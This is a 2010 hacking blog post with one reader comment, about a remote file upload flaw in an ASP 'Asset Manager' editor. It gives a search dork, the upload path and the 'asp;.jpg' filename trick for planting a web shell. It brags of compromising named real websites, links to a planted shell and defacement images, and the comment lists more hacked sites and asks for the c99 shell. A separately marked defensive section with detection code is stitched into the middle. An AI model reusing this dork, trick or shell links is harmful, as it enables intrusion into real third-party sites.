Friday, November 5, 2010

Asset Manager Remote File upload Vulnerability



Vulnerability: Remote File Upload


Risk: High

Dork: inurl:Editor/assetmanager/assetmanager.asp


Exploit:

http://[PATH]/assetmanager/assetmanager.asp


and upload your shell .... dz4all.asp;.jpg

Thanks to Dz4all



I am not uploading any shell, I just uploaded the image. If you want to learn how to upload the shell, try it yourself.
Here is one example of a shell uploaded by me:
Website:
http://shootright.co.uk/

Shell link:-

http://shootright.co.uk/images/870.asp;me.jpg

 

 

Image uploaded links:

http://www.aiu.edu/


Image:
http://www.aiu.edu/assets/public/a/avhack.JPG



http://www.licityguide.com/
Image:
http://www.licityguide.com/Editor/assets/avhack.jpg
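
For defenders: the filenames shown in this post (`dz4all.asp;.jpg`, `870.asp;me.jpg`) end in an image extension but carry a script extension earlier in the name, which IIS 6 handles as ASP. The following is an added example, not part of the original post: a strict upload-name check plus a scan of W3C-format IIS logs for such URIs. The extension lists, function names and sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Script extensions a web server may execute; extend for your stack (assumption).
SCRIPT_EXTS = ("asp", "asa", "cer", "aspx", "php")
ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif"}

# A script extension followed by ';' or another '.', e.g. "x.asp;.jpg" or "x.php.jpg".
_HIDDEN_SCRIPT = re.compile(r"\.(?:%s)(?=[;.])" % "|".join(SCRIPT_EXTS), re.IGNORECASE)


def upload_name_ok(filename):
    """Return True only for a plain image name with a single allowed extension."""
    name = unquote(filename).replace("\\", "/").rsplit("/", 1)[-1]
    if not re.fullmatch(r"[A-Za-z0-9_-]+\.[A-Za-z0-9]+", name):
        return False  # rejects ';', extra dots, spaces, control characters
    return name.rsplit(".", 1)[1].lower() in ALLOWED_EXTS


def suspicious_requests(log_lines):
    """Yield (client_ip, uri) for W3C log lines whose URI hides a script extension."""
    fields = []
    for line in log_lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        row = dict(zip(fields, line.split()))
        uri = unquote(row.get("cs-uri-stem", ""))
        if _HIDDEN_SCRIPT.search(uri):
            yield row.get("c-ip", "-"), uri


# Constructed sample log (not taken from any real server).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2010-11-05 10:00:01 192.0.2.10 GET /images/logo.jpg 200
2010-11-05 10:00:07 192.0.2.44 POST /Editor/assetmanager/assetmanager.asp 200
2010-11-05 10:00:09 192.0.2.44 GET /images/test.asp;me.jpg 200
2010-11-05 10:00:12 192.0.2.44 GET /Editor/assets/x/tool.php.jpg 200
""".splitlines()

if __name__ == "__main__":
    for ip, uri in suspicious_requests(SAMPLE_LOG):
        print(ip, uri)
```

Server-side, store uploads under a generated name in a directory where script execution is disabled, so a name that slips past the check still cannot run.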




1 comment:

  1. Hi Avi, check this out,
    don't publish this comment, just check those sites.


    http://www.aiu.edu/assets/public/hacked%20by%20av/home.jpg

    http://www.licityguide.com//Editor/assets/logo.jpg

    http://www.licityguide.com/Editor/assets/qqq/c99.php.jpg

    http://www.inntrondelagbrannvesen.no/dokumenter/maquina.png

    http://bamasociados.com/

    I want the c99.php shell script if you have one.
    Thanks
